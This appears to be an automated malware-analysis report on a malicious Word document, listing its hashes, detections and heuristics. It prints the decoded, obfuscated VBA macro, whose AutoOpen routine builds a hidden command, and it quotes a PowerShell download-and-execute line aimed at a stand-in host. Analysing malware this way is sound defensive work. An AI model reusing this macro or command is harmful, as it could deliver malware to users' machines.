Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4badcea44add4a53…

MALICIOUS

Office (OLE)

Size: 96.0 KB
Created: 2018-08-16 08:39:00
Authoring application: Microsoft Office Word
First seen: 2019-04-18
MD5: 292113ffd6d4122b66376737146149bc
SHA-1: 05f6ba69f9c21767a60135de7d39656220220aae
SHA-256: 4badcea44add4a532c149db05c93896e63ca13b4ae53af08e4e69e0aaaad7aa6
Risk Score: 142

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro attempts to construct and execute a PowerShell command, likely to download and run a second-stage payload. The PowerShell command it constructs is powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://evil.tld/payload')", indicating downloader functionality.

Heuristics (5)

  • ClamAV: Doc.Malware.Valyria-6691553-0 (critical) [CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Malware.Valyria-6691553-0
  • VBA macros detected (medium; 1 related finding) [OLE_VBA_MACROS]
    Document contains VBA macro code
  • AutoOpen macro (high) [OLE_VBA_AUTOOPEN]
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info) [EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 14461 bytes
SHA-256: 0284a7a5d0d15e727f15c317892676532744a30ba8016dec3ee888fa555c5b08
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "EAuokdbCuU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   Hour 8845
   Error Month(TtJjZu / PuLwJC + EWMYRq - jRWIDG)
   Hour 87
   Hour Second(57005 + bOzJf)
   Hour 1391
VBA.Shell% KeyString(Hwkziaat + TtwUQsAVFRbGb + vbKeyC + cnYVnWIBCrNR + vmfbCOpUBr) + GCbhBUf + nCXCQLs + kGwUhr + czLFjs + QZfIuLETav + pHkOs + fjmoHjwQH + pfdqoL + hzrpiZrwXku + tIoMVGXs + EwQhpUnL + HPJzUETJcK + HlhKhQFZVqslWQ + HYlDwaXnjrGt, 517825169 - 517825169
   Hour 117
   Error VvpTwB
End Sub


Attribute VB_Name = "AFSYnKpsjA"
Function kGwUhr()
On Error Resume Next
Error 299146586
   Hour 8
   Hour CDate(fdZZsW)
nhcTzlzwF = "m" + "D" + "  " + "  " + "  /" + "v: " + "   "
Error Str(62576 / PZZqz)
   Hour 486017147
JoXDFPiS = "   " + " " + " " + "   " + "/c"
Hour 8
   Error 860
   Error CDbl(FaQmXm - tGiuzp * 32236 - KZHPIH)
fCwQuYz = "   " + "  " + "  " + CStr(Chr(CNjCKOvHUbk + DPNAbhYNrtKFvV + 34 + mCcVXOG + YJnmMoBh)) + "   " + "   " + "Set" + "   "
Hour mUPrC
   Hour Sgn(322)
   Error lkkaH
rLfDwKTJiRr = "~" + " " + " " + "=p" + "owe" + "r;" + "he" + "ll6" + "1e" + "6J_" + "BN"
Error trhawz
   Error LCase(63)
IwimSjvOwLz = "_" + "HQ" + "_Wg" + "_" + "?_" + "G" + "4_Z" + "Q" + "B3_" + "C0_" + "9wB" + "i_"
Hour wnmVIP
   Error Second(612 - wIjWj + VdHuh - cwdEu)
   Hour CBool(BXoGmu)
DaFPldS = "G" + "o_Z" + "QB" + "j" + "_H" + "Q" + "_"
Hour Log(39430 * 29028 / LjEUp + jnZYK)
   Error Val(jhUbCm)
HEKIkZipoBI = "I_" + "BO" + "_" + "GU_" + "d__" + "u_F" + "s" + "_Z" + "QB" + "i"
Hour DNLnXH
   Hour CVar(2)
SzwdOU = "_E" + "M" + "_9" + "_" + "Bp_" + "G" + "U" + "_9" + "gB0" + "_" + "D;" + "_J_" + "Bi_"
Hour Sqr(8693)
   Hour CDate(zZaGCq)
zGELcE = "EE_" + "dw_" + "?_" + "Cs" + "_a_" + "B0"
Error Month(nCVipE - wZzjr)
   Hour Round(SIrSz / 2056)
EifOZmdWh = "_" + "HQ" + "_s_" + "_\" + "_" + "C" + "8_L" + "wBx" + "_H" + "U_Y" + "Q"
kGwUhr = nhcTzlzwF + JoXDFPiS + fCwQuYz + rLfDwKTJiRr + IwimSjvOwLz + DaFPldS + HEKIkZipoBI + SzwdOU + zGELcE + EifOZmdWh
   Error LCase(PXPtd)
   Error 84
   Error Str(3)
End Function
Function czLFjs()
On Error Resume Next
Hour CDate(VzSLu)
   Hour CDate(9063)
   Hour Month(92)
OXsavKBjOC = "Br" + "_G" + "U" + "_" + "sg" + "Bz_" + "GU" + "_s" + "gB" + "2_G" + "]_"
Hour Log(WUSkVF * QoczH - 50696 + cvhHw)
   Hour Sin(flutkM)
   Hour RURTH
dtOhEaLz = "Yw" + "Bl_" + "C" + "4_" + "9g" + "Bl_" + "H" + "Q" + "_L" + "wB" + "L"
Hour 7
   Hour 9265
   Hour Sqr(YXjSwY + OWSjw)
EJnBXSfTFpQ = "_" + "E" + "w_" + "sg" + "Bn_" + "E" + "__a" + "_B0" + "_" + "HQ" + "_s" + "__"
Error Val(bEzBQO)
   Error 53
SOkzI = "\_C" + "8_L" + "wB" + "3_" + "Hs" + "_" + "dw_" + "u_H" + "M" + "_9w"
Hour Oct(iEXNO)
   Error Hex(DjYLmV / BFkPDj)
diMRKsLT = "Bw_" + "G" + "g" + "_" + "sg" + "Bv_" + "C0_" + "eg" + "Bh" + "_"
Hour Log(wlhvDN)
   Error OjtqLq
tVlWAJvXR = "HI_" + "Y" + "Q_" + "u_G" + "M_9" + "wBt" + "_C8" + "_" + "sQ" + "BN" + "_D]" + "_9g"
Error 500592860
   Hour Second(zLdIN - wTNbc)
   Error dwdcp
LcclLa = "B)_" + "E4" + "_" + "swB" + "5_E" + "__" + "a_B" + "0_H" + "Q_" + "s_" + "_\_" + "C" + "8_"
Hour 64
   Error Oct(41)
   Error Cos(4)
chjFpF = "Lw" + "Bi" + "_G" + "]_Z" + "w"
Error Hex(FbGqOb / CZbSN - wwrDC - qAcuWz)
   Error HzIwCz
   Hour Int(63353 - OTnXE)
mzswsk = "B" + "0_H" + "Y" + "_" + "ag" + "Bv"
Hour 659
   Hour Hex(3327)
   Error Log(AHfhu + nthvch)
oNHEYwVAp = "_" + "GI" + "_9" + "_B" + "p" + "_HM" + "_d" + "__u" + "_" + "G"
Hour 9
   Hour CDate(GnvInM)
   Error Round(506261560)
soocRoERLDn = "M" + "_9w" + "B" + "t_C" + "8_d" + "QB" + "U_" + "GM" + "_aQ" + "B"
Hour FdsozY
   Error 3
   Hour CDate(IAqTjA)
hUPksE = "r_" + "E" + "__" + "a_" + "B0" + "_H" + "Q_" + "s_" + "_\" + "_C8" + "_L"
Hour Log(QzILY / iEsTT)
   Error Sqr(122)
   Error CDbl(8188)
VAXIkk = "wB" 
... (truncated)